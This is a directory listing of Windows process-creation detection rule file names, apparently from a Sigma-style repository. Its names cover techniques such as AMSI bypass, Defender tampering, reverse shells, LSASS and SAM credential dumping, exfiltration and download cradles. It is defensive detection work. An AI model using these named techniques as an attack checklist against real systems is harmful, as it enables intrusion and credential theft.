│ │ ├── proc_creation_win_office_exec_from_trusted_locations.yml
│ │ ├── proc_creation_win_office_onenote_embedded_script_execution.yml
│ │ ├── proc_creation_win_office_onenote_susp_child_processes.yml
│ │ ├── proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml
│ │ ├── proc_creation_win_office_outlook_execution_from_temp.yml
│ │ ├── proc_creation_win_office_outlook_susp_child_processes.yml
│ │ ├── proc_creation_win_office_outlook_susp_child_processes_remote.yml
│ │ ├── proc_creation_win_office_spawn_exe_from_users_directory.yml
│ │ ├── proc_creation_win_office_susp_child_processes.yml
│ │ ├── proc_creation_win_office_winword_dll_load.yml
│ │ ├── proc_creation_win_offlinescannershell_mpclient_sideloading.yml
│ │ ├── proc_creation_win_pdqdeploy_execution.yml
│ │ ├── proc_creation_win_pdqdeploy_runner_susp_children.yml
│ │ ├── proc_creation_win_perl_inline_command_execution.yml
│ │ ├── proc_creation_win_php_inline_command_execution.yml
│ │ ├── proc_creation_win_ping_hex_ip.yml
│ │ ├── proc_creation_win_pktmon_execution.yml
│ │ ├── proc_creation_win_plink_port_forwarding.yml
│ │ ├── proc_creation_win_plink_susp_tunneling.yml
│ │ ├── proc_creation_win_powercfg_execution.yml
│ │ ├── proc_creation_win_powershell_aadinternals_cmdlets_execution.yml
│ │ ├── proc_creation_win_powershell_active_directory_module_dll_import.yml
│ │ ├── proc_creation_win_powershell_add_windows_capability.yml
│ │ ├── proc_creation_win_powershell_amsi_init_failed_bypass.yml
│ │ ├── proc_creation_win_powershell_amsi_null_bits_bypass.yml
│ │ ├── proc_creation_win_powershell_audio_capture.yml
│ │ ├── proc_creation_win_powershell_base64_encoded_cmd.yml
│ │ ├── proc_creation_win_powershell_base64_encoded_cmd_patterns.yml
│ │ ├── proc_creation_win_powershell_base64_encoded_obfusc.yml
│ │ ├── proc_creation_win_powershell_base64_frombase64string.yml
│ │ ├── proc_creation_win_powershell_base64_hidden_flag.yml
│ │ ├── proc_creation_win_powershell_base64_iex.yml
│ │ ├── proc_creation_win_powershell_base64_invoke.yml
│ │ ├── proc_creation_win_powershell_base64_mppreference.yml
│ │ ├── proc_creation_win_powershell_base64_reflection_assembly_load.yml
│ │ ├── proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml
│ │ ├── proc_creation_win_powershell_base64_wmi_classes.yml
│ │ ├── proc_creation_win_powershell_cl_invocation.yml
│ │ ├── proc_creation_win_powershell_cl_loadassembly.yml
│ │ ├── proc_creation_win_powershell_cl_mutexverifiers.yml
│ │ ├── proc_creation_win_powershell_cmdline_convertto_securestring.yml
│ │ ├── proc_creation_win_powershell_cmdline_reversed_strings.yml
│ │ ├── proc_creation_win_powershell_cmdline_special_characters.yml
│ │ ├── proc_creation_win_powershell_comobject_msi.yml
│ │ ├── proc_creation_win_powershell_comobject_msi_remote.yml
│ │ ├── proc_creation_win_powershell_computer_discovery_get_adcomputer.yml
│ │ ├── proc_creation_win_powershell_console_history_file_access.yml
│ │ ├── proc_creation_win_powershell_create_service.yml
│ │ ├── proc_creation_win_powershell_decode_gzip.yml
│ │ ├── proc_creation_win_powershell_decrypt_pattern.yml
│ │ ├── proc_creation_win_powershell_defender_disable_feature.yml
│ │ ├── proc_creation_win_powershell_defender_exclusion.yml
│ │ ├── proc_creation_win_powershell_disable_defender_av_security_monitoring.yml
│ │ ├── proc_creation_win_powershell_disable_firewall.yml
│ │ ├── proc_creation_win_powershell_disable_ie_features.yml
│ │ ├── proc_creation_win_powershell_downgrade_attack.yml
│ │ ├── proc_creation_win_powershell_download_com_cradles.yml
│ │ ├── proc_creation_win_powershell_download_cradle_obfuscated.yml
│ │ ├── proc_creation_win_powershell_download_dll.yml
│ │ ├── proc_creation_win_powershell_download_iex.yml
│ │ ├── proc_creation_win_powershell_download_patterns.yml
│ │ ├── proc_creation_win_powershell_download_susp_file_sharing_domains.yml
│ │ ├── proc_creation_win_powershell_dsinternals_cmdlets.yml
│ │ ├── proc_creation_win_powershell_email_exfil.yml
│ │ ├── proc_creation_win_powershell_enable_susp_windows_optional_feature.yml
│ │ ├── proc_creation_win_powershell_encode.yml
│ │ ├── proc_creation_win_powershell_encoding_patterns.yml
│ │ ├── proc_creation_win_powershell_exec_data_file.yml
│ │ ├── proc_creation_win_powershell_export_certificate.yml
│ │ ├── proc_creation_win_powershell_frombase64string.yml
│ │ ├── proc_creation_win_powershell_frombase64string_archive.yml
│ │ ├── proc_creation_win_powershell_get_clipboard.yml
│ │ ├── proc_creation_win_powershell_get_localgroup_member_recon.yml
│ │ ├── proc_creation_win_powershell_getprocess_lsass.yml
│ │ ├── proc_creation_win_powershell_hide_services_via_set_service.yml
│ │ ├── proc_creation_win_powershell_iex_patterns.yml
│ │ ├── proc_creation_win_powershell_import_cert_susp_locations.yml
│ │ ├── proc_creation_win_powershell_import_module_susp_dirs.yml
│ │ ├── proc_creation_win_powershell_install_unsigned_appx_packages.yml
│ │ ├── proc_creation_win_powershell_invocation_specific.yml
│ │ ├── proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
│ │ ├── proc_creation_win_powershell_invoke_webrequest_download.yml
│ │ ├── proc_creation_win_powershell_kerberos_kerberos_ticket_request_via_cli.yml
│ │ ├── proc_creation_win_powershell_mailboxexport_share.yml
│ │ ├── proc_creation_win_powershell_malicious_cmdlets.yml
│ │ ├── proc_creation_win_powershell_msexchange_transport_agent.yml
│ │ ├── proc_creation_win_powershell_non_interactive_execution.yml
│ │ ├── proc_creation_win_powershell_obfuscation_via_utf8.yml
│ │ ├── proc_creation_win_powershell_public_folder.yml
│ │ ├── proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
│ │ ├── proc_creation_win_powershell_remove_mppreference.yml
│ │ ├── proc_creation_win_powershell_reverse_shell_connection.yml
│ │ ├── proc_creation_win_powershell_run_script_from_ads.yml
│ │ ├── proc_creation_win_powershell_run_script_from_input_stream.yml
│ │ ├── proc_creation_win_powershell_sam_access.yml
│ │ ├── proc_creation_win_powershell_script_engine_parent.yml
│ │ ├── proc_creation_win_powershell_service_dacl_modification_set_service.yml
│ │ ├── proc_creation_win_powershell_set_acl.yml
│ │ ├── proc_creation_win_powershell_set_acl_susp_location.yml
│ │ ├── proc_creation_win_powershell_set_policies_to_unsecure_level.yml
│ │ ├── proc_creation_win_powershell_set_service_disabled.yml
│ │ ├── proc_creation_win_powershell_shadowcopy_deletion.yml
│ │ ├── proc_creation_win_powershell_snapins_hafnium.yml
│ │ ├── proc_creation_win_powershell_stop_service.yml
│ │ ├── proc_creation_win_powershell_susp_download_patterns.yml
│ │ ├── proc_creation_win_powershell_susp_parameter_variation.yml
│ │ ├── proc_creation_win_powershell_susp_parent_process.yml
│ │ ├── proc_creation_win_powershell_susp_ps_appdata.yml
│ │ ├── proc_creation_win_powershell_token_obfuscation.yml
│ │ ├── proc_creation_win_powershell_uninstall_defender_feature.yml
│ │ ├── proc_creation_win_powershell_user_discovery_get_aduser.yml
│ │ ├── proc_creation_win_powershell_webclient_casing.yml
│ │ ├── proc_creation_win_powershell_x509enrollment.yml
│ │ ├── proc_creation_win_powershell_xor_commandline.yml
│ │ ├── proc_creation_win_powershell_zip_compress.yml
│ │ ├── proc_creation_win_presentationhost_download.yml
│ │ ├── proc_creation_win_presentationhost_uncommon_location_exec.yml
│ │ ├── proc_creation_win_pressanykey_lolbin_execution.yml
│ │ ├── proc_creation_win_print_remote_file_copy.yml
│ │ ├── proc_creation_win_protocolhandler_download.yml
│ │ ├── proc_creation_win_provlaunch_potential_abuse.yml
│ │ ├── proc_creation_win_provlaunch_susp_child_process.yml
│ │ ├── proc_creation_win_psr_capture_screenshots.yml
│ │ ├── proc_creation_win_pua_3proxy_execution.yml
│ │ ├── proc_creation_win_pua_adfind_enumeration.yml
│ │ ├── proc_creation_win_pua_adfind_execution.yml
│ │ ├── proc_creation_win_pua_adfind_susp_usage.yml
│ │ ├── proc_creation_win_pua_advanced_ip_scanner.yml
│ │ ├── proc_creation_win_pua_advanced_port_scanner.yml
│ │ ├── proc_creation_win_pua_advancedrun.yml
│ │ ├── proc_creation_win_pua_advancedrun_priv_user.yml
│ │ ├── proc_creation_win_pua_chisel.yml
│ │ ├── proc_creation_win_pua_cleanwipe.yml
│ │ ├── proc_creation_win_pua_crassus.yml
│ │ ├── proc_creation_win_pua_csexec.yml
│ │ ├── proc_creation_win_pua_defendercheck.yml
│ │ ├── proc_creation_win_pua_ditsnap.yml
│ │ ├── proc_creation_win_pua_frp.yml
│ │ ├── proc_creation_win_pua_iox.yml
│ │ ├── proc_creation_win_pua_kdu_driver_tool.yml
│ │ ├── proc_creation_win_pua_mouselock_execution.yml
│ │ ├── proc_creation_win_pua_netcat.yml
│ │ ├── proc_creation_win_pua_netscan.yml
│ │ ├── proc_creation_win_pua_ngrok.yml
│ │ ├── proc_creation_win_pua_nimgrab.yml
│ │ ├── proc_creation_win_pua_nimscan.yml
│ │ ├── proc_creation_win_pua_nircmd.yml
│ │ ├── proc_creation_win_pua_nircmd_as_system.yml
│ │ ├── proc_creation_win_pua_nmap_zenmap.yml
│ │ ├── proc_creation_win_pua_nps.yml
│ │ ├── proc_creation_win_pua_nsudo.yml
│ │ ├── proc_creation_win_pua_pingcastle.yml
│ │ ├── proc_creation_win_pua_pingcastle_script_parent.yml
│ │ ├── proc_creation_win_pua_process_hacker.yml
│ │ ├── proc_creation_win_pua_radmin.yml
│ │ ├── proc_creation_win_pua_rcedit_execution.yml
│ │ ├── proc_creation_win_pua_rclone_execution.yml
│ │ ├── proc_creation_win_pua_restic.yml
│ │ ├── proc_creation_win_pua_runxcmd.yml
│ │ ├── proc_creation_win_pua_seatbelt.yml
│ │ ├── proc_creation_win_pua_system_informer.yml
│ │ ├── proc_creation_win_pua_trufflehog.yml
│ │ ├── proc_creation_win_pua_webbrowserpassview.yml
│ │ ├── proc_creation_win_pua_wsudo_susp_execution.yml
│ │ ├── proc_creation_win_python_adidnsdump.yml
│ │ ├── proc_creation_win_python_inline_command_execution.yml
│ │ ├── proc_creation_win_python_pty_spawn.yml
│ │ ├── proc_creation_win_qemu_suspicious_execution.yml
│ │ ├── proc_creation_win_query_session_exfil.yml
│ │ ├── proc_creation_win_quickassist_execution.yml
│ │ ├── proc_creation_win_rar_compress_data.yml
│ │ ├── proc_creation_win_rar_compression_with_password.yml
│ │ ├── proc_creation_win_rar_susp_greedy_compression.yml
│ │ ├── proc_creation_win_rasdial_execution.yml
│ │ ├── proc_creation_win_rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.yml
│ │ ├── proc_creation_win_rdrleakdiag_process_dumping.yml
│ │ ├── proc_creation_win_reagentc_disable_windows_recovery_environment.yml
│ │ ├── proc_creation_win_reg_add_run_key.yml
│ │ ├── proc_creation_win_reg_add_safeboot.yml
│ │ ├── proc_creation_win_reg_bitlocker.yml
│ │ ├── proc_creation_win_reg_credential_access_via_password_filter.yml
│ │ ├── proc_creation_win_reg_defender_exclusion.yml
│ │ ├── proc_creation_win_reg_delete_runmru.yml
│ │ ├── proc_creation_win_reg_delete_safeboot.yml
│ │ ├── proc_creation_win_reg_delete_services.yml
│ │ ├── proc_creation_win_reg_desktop_background_change.yml
│ │ ├── proc_creation_win_reg_direct_asep_registry_keys_modification.yml
│ │ ├── proc_creation_win_reg_disable_defender_wmi_autologger.yml
│ │ ├── proc_creation_win_reg_disable_sec_services.yml
│ │ ├── proc_creation_win_reg_dumping_sensitive_hives.yml
│ │ ├── proc_creation_win_reg_enable_windows_recall.yml
│ │ ├── proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
│ │ ├── proc_creation_win_reg_import_from_suspicious_paths.yml
│ │ ├── proc_creation_win_reg_lsa_disable_restricted_admin.yml
│ │ ├── proc_creation_win_reg_lsa_ppl_protection_disabled.yml
│ │ ├── proc_creation_win_reg_machineguid.yml
│ │ ├── proc_creation_win_reg_modify_group_policy_settings.yml
│ │ ├── proc_creation_win_reg_nolmhash.yml
│ │ ├── proc_creation_win_reg_query_registry.yml
│ │ ├── proc_creation_win_reg_rdp_keys_tamper.yml
│ │ ├── proc_creation_win_reg_screensaver.yml
│ │ ├── proc_creation_win_reg_service_imagepath_change.yml
│ │ ├── proc_creation_win_reg_software_discovery.yml
│ │ ├── proc_creation_win_reg_susp_paths.yml
│ │ ├── proc_creation_win_reg_system_language_discovery.yml
│ │ ├── proc_creation_win_reg_volsnap_disable.yml
│ │ ├── proc_creation_win_reg_windows_defender_tamper.yml
│ │ ├── proc_creation_win_reg_write_protect_for_storage_disabled.yml
│ │ ├── proc_creation_win_regasm_no_flag_or_dll_execution.yml
│ │ ├── proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml
│ │ ├── proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml
│ │ ├── proc_creation_win_regedit_export_critical_keys.yml
│ │ ├── proc_creation_win_regedit_export_keys.yml
│ │ ├── proc_creation_win_regedit_import_keys.yml
│ │ ├── proc_creation_win_regedit_import_keys_ads.yml
│ │ ├── proc_creation_win_regedit_trustedinstaller.yml
│ │ ├── proc_creation_win_regini_ads.yml
│ │ ├── proc_creation_win_regini_execution.yml
│ │ ├── proc_creation_win_registry_cimprovider_dll_load.yml
│ │ ├── proc_creation_win_registry_enumeration_for_credentials_cli.yml
│ │ ├── proc_creation_win_registry_export_of_thirdparty_creds.yml
│ │ ├── proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml
│ │ ├── proc_creation_win_registry_install_reg_debugger_backdoor.yml
│ │ ├── proc_creation_win_registry_logon_script.yml
│ │ ├── proc_creation_win_registry_new_network_provider.yml
│ │ ├── proc_creation_win_registry_office_disable_python_security_warnings.yml
│ │ ├── proc_creation_win_registry_privilege_escalation_via_service_key.yml
│ │ ├── proc_creation_win_registry_provlaunch_provisioning_command.yml
│ │ ├── proc_creation_win_registry_set_unsecure_powershell_policy.yml
│ │ ├── proc_creation_win_registry_special_accounts_hide_user.yml
│ │ ├── proc_creation_win_registry_typed_paths_persistence.yml
│ │ ├── proc_creation_win_regsvr32_flags_anomaly.yml
│ │ ├── proc_creation_win_regsvr32_http_ip_pattern.yml
│ │ ├── proc_creation_win_regsvr32_network_pattern.yml
│ │ ├── proc_creation_win_regsvr32_remote_share.yml
│ │ ├── proc_creation_win_regsvr32_susp_child_process.yml
│ │ ├── proc_creation_win_regsvr32_susp_exec_path_1.yml
│ │ ├── proc_creation_win_regsvr32_susp_exec_path_2.yml
│ │ ├── proc_creation_win_regsvr32_susp_extensions.yml
│ │ ├── proc_creation_win_regsvr32_susp_parent.yml
│ │ ├── proc_creation_win_regsvr32_uncommon_extension.yml
│ │ ├── proc_creation_win_remote_access_tools_anydesk.yml
│ │ ├── proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml
│ │ ├── proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml
│ │ ├── proc_creation_win_remote_access_tools_anydesk_silent_install.yml
│ │ ├── proc_creation_win_remote_access_tools_anydesk_susp_exec.yml
│ │ ├── proc_creation_win_remote_access_tools_gotoopener.yml
│ │ ├── proc_creation_win_remote_access_tools_logmein.yml
│ │ ├── proc_creation_win_remote_access_tools_meshagent_arguments.yml
│ │ ├── proc_creation_win_remote_access_tools_meshagent_exec.yml
│ │ ├── proc_creation_win_remote_access_tools_netsupport.yml
│ │ ├── proc_creation_win_remote_access_tools_netsupport_susp_exec.yml
│ │ ├── proc_creation_win_remote_access_tools_renamed_meshagent_execution.yml
│ │ ├── proc_creation_win_remote_access_tools_rurat_non_default_location.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect_webshell.yml
│ │ ├── proc_creation_win_remote_access_tools_simple_help.yml
│ │ ├── proc_creation_win_remote_access_tools_tacticalrmm_agent_registration_via_cli.yml
│ │ ├── proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml
│ │ ├── proc_creation_win_remote_access_tools_ultraviewer.yml
│ │ ├── proc_creation_win_remote_time_discovery.yml
│ │ ├── proc_creation_win_renamed_adfind.yml
│ │ ├── proc_creation_win_renamed_autohotkey.yml
│ │ ├── proc_creation_win_renamed_autoit.yml
│ │ ├── proc_creation_win_renamed_binary.yml
│ │ ├── proc_creation_win_renamed_binary_highly_relevant.yml
│ │ ├── proc_creation_win_renamed_boinc.yml
│ │ ├── proc_creation_win_renamed_browsercore.yml
│ │ ├── proc_creation_win_renamed_cloudflared.yml
│ │ ├── proc_creation_win_renamed_createdump.yml
│ │ ├── proc_creation_win_renamed_curl.yml
│ │ ├── proc_creation_win_renamed_dctask64.yml
│ │ ├── proc_creation_win_renamed_ftp.yml
│ │ ├── proc_creation_win_renamed_gpg4win.yml
│ │ ├── proc_creation_win_renamed_jusched.yml
│ │ ├── proc_creation_win_renamed_mavinject.yml
│ │ ├── proc_creation_win_renamed_megasync.yml
│ │ ├── proc_creation_win_renamed_msdt.yml
│ │ ├── proc_creation_win_renamed_msteams.yml
│ │ ├── proc_creation_win_renamed_netsupport_rat.yml
│ │ ├── proc_creation_win_renamed_nircmd.yml
│ │ ├── proc_creation_win_renamed_office_processes.yml
│ │ ├── proc_creation_win_renamed_paexec.yml
│ │ ├── proc_creation_win_renamed_pingcastle.yml
│ │ ├── proc_creation_win_renamed_plink.yml
│ │ ├── proc_creation_win_renamed_pressanykey.yml
│ │ ├── proc_creation_win_renamed_rundll32_dllregisterserver.yml
│ │ ├── proc_creation_win_renamed_rurat.yml
│ │ ├── proc_creation_win_renamed_schtasks_execution.yml
│ │ ├── proc_creation_win_renamed_sysinternals_debugview.yml
│ │ ├── proc_creation_win_renamed_sysinternals_procdump.yml
│ │ ├── proc_creation_win_renamed_sysinternals_psexec_service.yml
│ │ ├── proc_creation_win_renamed_sysinternals_sdelete.yml
│ │ ├── proc_creation_win_renamed_vmnat.yml
│ │ ├── proc_creation_win_renamed_whoami.yml
│ │ ├── proc_creation_win_rpcping_credential_capture.yml
│ │ ├── proc_creation_win_ruby_inline_command_execution.yml
│ │ ├── proc_creation_win_rundll32_ads_stored_dll_execution.yml
│ │ ├── proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml
│ │ ├── proc_creation_win_rundll32_inline_vbs.yml
│ │ ├── proc_creation_win_rundll32_installscreensaver.yml
│ │ ├── proc_creation_win_rundll32_keymgr.yml
│ │ ├── proc_creation_win_rundll32_mshtml_runhtmlapplication.yml
│ │ ├── proc_creation_win_rundll32_no_params.yml
│ │ ├── proc_creation_win_rundll32_ntlmrelay.yml
│ │ ├── proc_creation_win_rundll32_obfuscated_ordinal_call.yml
│ │ ├── proc_creation_win_rundll32_parent_explorer.yml
│ │ ├── proc_creation_win_rundll32_process_dump_via_comsvcs.yml
│ │ ├── proc_creation_win_rundll32_registered_com_objects.yml
│ │ ├── proc_creation_win_rundll32_run_locations.yml
│ │ ├── proc_creation_win_rundll32_setupapi_installhinfsection.yml
│ │ ├── proc_creation_win_rundll32_shell32_susp_execution.yml
│ │ ├── proc_creation_win_rundll32_shelldispatch_potential_abuse.yml
│ │ ├── proc_creation_win_rundll32_spawn_explorer.yml
│ │ ├── proc_creation_win_rundll32_susp_activity.yml
│ │ ├── proc_creation_win_rundll32_susp_control_dll_load.yml
│ │ ├── proc_creation_win_rundll32_susp_execution_with_image_extension.yml
│ │ ├── proc_creation_win_rundll32_susp_shellexec_execution.yml
│ │ ├── proc_creation_win_rundll32_susp_shellexec_ordinal_execution.yml
│ │ ├── proc_creation_win_rundll32_susp_shimcache_flush.yml
│ │ ├── proc_creation_win_rundll32_sys.yml
│ │ ├── proc_creation_win_rundll32_udl_exec.yml
│ │ ├── proc_creation_win_rundll32_unc_path.yml
│ │ ├── proc_creation_win_rundll32_uncommon_dll_extension.yml
│ │ ├── proc_creation_win_rundll32_user32_dll.yml
│ │ ├── proc_creation_win_rundll32_webdav_client_execution.yml
│ │ ├── proc_creation_win_rundll32_webdav_client_susp_execution.yml
│ │ ├── proc_creation_win_rundll32_without_parameters.yml
│ │ ├── proc_creation_win_runonce_execution.yml
│ │ ├── proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
│ │ ├── proc_creation_win_sc_create_service.yml
│ │ ├── proc_creation_win_sc_disable_service.yml
│ │ ├── proc_creation_win_sc_new_kernel_driver.yml
│ │ ├── proc_creation_win_sc_query_interesting_services.yml
│ │ ├── proc_creation_win_sc_sdset_allow_service_changes.yml
│ │ ├── proc_creation_win_sc_sdset_deny_service_access.yml
│ │ ├── proc_creation_win_sc_sdset_hide_sevices.yml
│ │ ├── proc_creation_win_sc_sdset_modification.yml
│ │ ├── proc_creation_win_sc_service_path_modification.yml
│ │ ├── proc_creation_win_sc_service_tamper_for_persistence.yml
│ │ ├── proc_creation_win_sc_stop_service.yml
│ │ ├── proc_creation_win_schtasks_appdata_local_system.yml
│ │ ├── proc_creation_win_schtasks_change.yml
│ │ ├── proc_creation_win_schtasks_creation.yml
│ │ ├── proc_creation_win_schtasks_creation_temp_folder.yml
│ │ ├── proc_creation_win_schtasks_curl_and_powershell_combo.yml
│ │ ├── proc_creation_win_schtasks_delete.yml
│ │ ├── proc_creation_win_schtasks_delete_all.yml
│ │ ├── proc_creation_win_schtasks_disable.yml
│ │ ├── proc_creation_win_schtasks_env_folder.yml
│ │ ├── proc_creation_win_schtasks_folder_combos.yml
│ │ ├── proc_creation_win_schtasks_guid_task_name.yml
│ │ ├── proc_creation_win_schtasks_one_time_only_midnight_task.yml
│ │ ├── proc_creation_win_schtasks_openssh_tunnelling.yml
│ │ ├── proc_creation_win_schtasks_persistence_windows_telemetry.yml
│ │ ├── proc_creation_win_schtasks_powershell_persistence.yml
│ │ ├── proc_creation_win_schtasks_reg_loader.yml
│ │ ├── proc_creation_win_schtasks_reg_loader_encoded.yml
│ │ ├── proc_creation_win_schtasks_schedule_type.yml
│ │ ├── proc_creation_win_schtasks_schedule_type_system.yml
│ │ ├── proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml
│ │ ├── proc_creation_win_schtasks_susp_pattern.yml
│ │ ├── proc_creation_win_schtasks_system.yml
│ │ ├── proc_creation_win_schtasks_system_process.yml
│ │ ├── proc_creation_win_scrcons_susp_child_process.yml
│ │ ├── proc_creation_win_sdbinst_shim_persistence.yml
│ │ ├── proc_creation_win_sdbinst_susp_extension.yml
│ │ ├── proc_creation_win_sdclt_child_process.yml
│ │ ├── proc_creation_win_sdiagnhost_susp_child.yml
│ │ ├── proc_creation_win_secedit_execution.yml
│ │ ├── proc_creation_win_security_susp_node_js_execution.yml
│ │ ├── proc_creation_win_servu_susp_child_process.yml
│ │ ├── proc_creation_win_setres_uncommon_child_process.yml
│ │ ├── proc_creation_win_setspn_spn_enumeration.yml
│ │ ├── proc_creation_win_setup16_custom_lst_execution.yml
│ │ ├── proc_creation_win_shutdown_execution.yml
│ │ ├── proc_creation_win_shutdown_logoff.yml
│ │ ├── proc_creation_win_sigverif_uncommon_child_process.yml
│ │ ├── proc_creation_win_sndvol_susp_child_processes.yml
│ │ ├── proc_creation_win_soundrecorder_audio_capture.yml
│ │ ├── proc_creation_win_speechruntime_child_process.yml
│ │ ├── proc_creation_win_splwow64_cli_anomaly.yml
│ │ ├── proc_creation_win_spoolsv_susp_child_processes.yml
│ │ ├── proc_creation_win_sqlcmd_veeam_db_recon.yml
│ │ ├── proc_creation_win_sqlcmd_veeam_dump.yml
│ │ ├── proc_creation_win_sqlite_chromium_profile_data.yml
│ │ ├── proc_creation_win_sqlite_firefox_gecko_profile_data.yml
│ │ ├── proc_creation_win_squirrel_download.yml
│ │ ├── proc_creation_win_squirrel_proxy_execution.yml
│ │ ├── proc_creation_win_ssh_port_forward.yml
│ │ ├── proc_creation_win_ssh_proxy_execution.yml
│ │ ├── proc_creation_win_ssh_rdp_tunneling.yml
│ │ ├── proc_creation_win_ssm_agent_abuse.yml
│ │ ├── proc_creation_win_stordiag_susp_child_process.yml
│ │ ├── proc_creation_win_susp_16bit_application.yml
│ │ ├── proc_creation_win_susp_abusing_debug_privilege.yml
│ │ ├── proc_creation_win_susp_add_user_local_admin_group.yml
│ │ ├── proc_creation_win_susp_add_user_privileged_group.yml
│ │ ├── proc_creation_win_susp_add_user_remote_desktop_group.yml
│ │ ├── proc_creation_win_susp_alternate_data_streams.yml
│ │ ├── proc_creation_win_susp_always_install_elevated_windows_installer.yml
│ │ ├── proc_creation_win_susp_appx_execution.yml
│ │ ├── proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml
│ │ ├── proc_creation_win_susp_archiver_iso_phishing.yml
│ │ ├── proc_creation_win_susp_automated_collection.yml
│ │ ├── proc_creation_win_susp_bad_opsec_sacrificial_processes.yml
│ │ ├── proc_creation_win_susp_browser_launch_from_document_reader_process.yml
│ │ ├── proc_creation_win_susp_child_process_as_system_.yml
│ │ ├── proc_creation_win_susp_cli_obfuscation_escape_char.yml
│ │ ├── proc_creation_win_susp_cli_obfuscation_unicode_img.yml
│ │ ├── proc_creation_win_susp_clickfix_filefix_execution.yml
│ │ ├── proc_creation_win_susp_clickfix_filefix_whitespace_padding.yml
│ │ ├── proc_creation_win_susp_cmd_for_loop_execution_with_recursive_directory_search.yml
│ │ ├── proc_creation_win_susp_commandline_path_traversal_evasion.yml
│ │ ├── proc_creation_win_susp_copy_browser_data.yml
│ │ ├── proc_creation_win_susp_copy_lateral_movement.yml
│ │ ├── proc_creation_win_susp_copy_system_dir.yml
│ │ ├── proc_creation_win_susp_copy_system_dir_lolbin.yml
│ │ ├── proc_creation_win_susp_crypto_mining_monero.yml
│ │ ├── proc_creation_win_susp_data_exfiltration_via_cli.yml
│ │ ├── proc_creation_win_susp_disable_raccine.yml
│ │ ├── proc_creation_win_susp_double_extension.yml
│ │ ├── proc_creation_win_susp_double_extension_parent.yml
│ │ ├── proc_creation_win_susp_download_office_domain.yml
│ │ ├── proc_creation_win_susp_dumpstack_log_evasion.yml
│ │ ├── proc_creation_win_susp_elavated_msi_spawned_shell.yml
│ │ ├── proc_creation_win_susp_electron_app_children.yml
│ │ ├── proc_creation_win_susp_electron_execution_proxy.yml
│ │ ├── proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml
│ │ ├── proc_creation_win_susp_embed_exe_lnk.yml
│ │ ├── proc_creation_win_susp_emoji_usage_in_cli_1.yml
│ │ ├── proc_creation_win_susp_emoji_usage_in_cli_2.yml
│ │ ├── proc_creation_win_susp_emoji_usage_in_cli_3.yml
│ │ ├── proc_creation_win_susp_emoji_usage_in_cli_4.yml
│ │ ├── proc_creation_win_susp_etw_modification_cmdline.yml
│ │ ├── proc_creation_win_susp_etw_trace_evasion.yml
│ │ ├── proc_creation_win_susp_eventlog_clear.yml
│ │ ├── proc_creation_win_susp_eventlog_content_recon.yml
│ │ ├── proc_creation_win_susp_execution_from_public_folder_as_parent.yml
│ │ ├── proc_creation_win_susp_execution_path.yml
│ │ ├── proc_creation_win_susp_file_characteristics.yml
│ │ ├── proc_creation_win_susp_filefix_execution_pattern.yml
│ │ ├── proc_creation_win_susp_gather_network_info_execution.yml
│ │ ├── proc_creation_win_susp_hidden_dir_index_allocation.yml
│ │ ├── proc_creation_win_susp_hiding_malware_in_fonts_folder.yml
│ │ ├── proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml
│ │ ├── proc_creation_win_susp_image_missing.yml
│ │ ├── proc_creation_win_susp_inline_base64_mz_header.yml
│ │ ├── proc_creation_win_susp_inline_node_js_execution.yml
│ │ ├── proc_creation_win_susp_inline_win_api_access.yml
│ │ ├── proc_creation_win_susp_jwt_token_search.yml
│ │ ├── proc_creation_win_susp_lnk_exec_hidden_cmd.yml
│ │ ├── proc_creation_win_susp_local_system_owner_account_discovery.yml
│ │ ├── proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml
│ │ ├── proc_creation_win_susp_lsass_dmp_cli_keywords.yml
│ │ ├── proc_creation_win_susp_ms_appinstaller_download.yml
│ │ ├── proc_creation_win_susp_network_command.yml
│ │ ├── proc_creation_win_susp_network_scan_loop.yml
│ │ ├── proc_creation_win_susp_network_sniffing.yml
│ │ ├── proc_creation_win_susp_no_image_name.yml
│ │ ├── proc_creation_win_susp_non_exe_image.yml
│ │ ├── proc_creation_win_susp_non_priv_reg_or_ps.yml
│ │ ├── proc_creation_win_susp_ntds.yml
│ │ ├── proc_creation_win_susp_nteventlogfile_usage.yml
│ │ ├── proc_creation_win_susp_ntfs_short_name_path_use_image.yml
│ │ ├── proc_creation_win_susp_ntfs_short_name_use_cli.yml
│ │ ├── proc_creation_win_susp_ntfs_short_name_use_image.yml
│ │ ├── proc_creation_win_susp_obfuscated_ip_download.yml
│ │ ├── proc_creation_win_susp_obfuscated_ip_via_cli.yml
│ │ ├── proc_creation_win_susp_parents.yml
│ │ ├── proc_creation_win_susp_powershell_execution_via_dll.yml
│ │ ├── proc_creation_win_susp_priv_escalation_via_named_pipe.yml
│ │ ├── proc_creation_win_susp_private_keys_recon.yml
│ │ ├── proc_creation_win_susp_privilege_escalation_cli_patterns.yml
│ │ ├── proc_creation_win_susp_proc_wrong_parent.yml
│ │ ├── proc_creation_win_susp_progname.yml
│ │ ├── proc_creation_win_susp_recon.yml
│ │ ├── proc_creation_win_susp_recycle_bin_fake_execution.yml
│ │ ├── proc_creation_win_susp_redirect_local_admin_share.yml
│ │ ├── proc_creation_win_susp_registry_modification_of_ms_setting_protocol_handler.yml
│ │ ├── proc_creation_win_susp_remote_desktop_tunneling.yml
│ │ ├── proc_creation_win_susp_right_to_left_override.yml
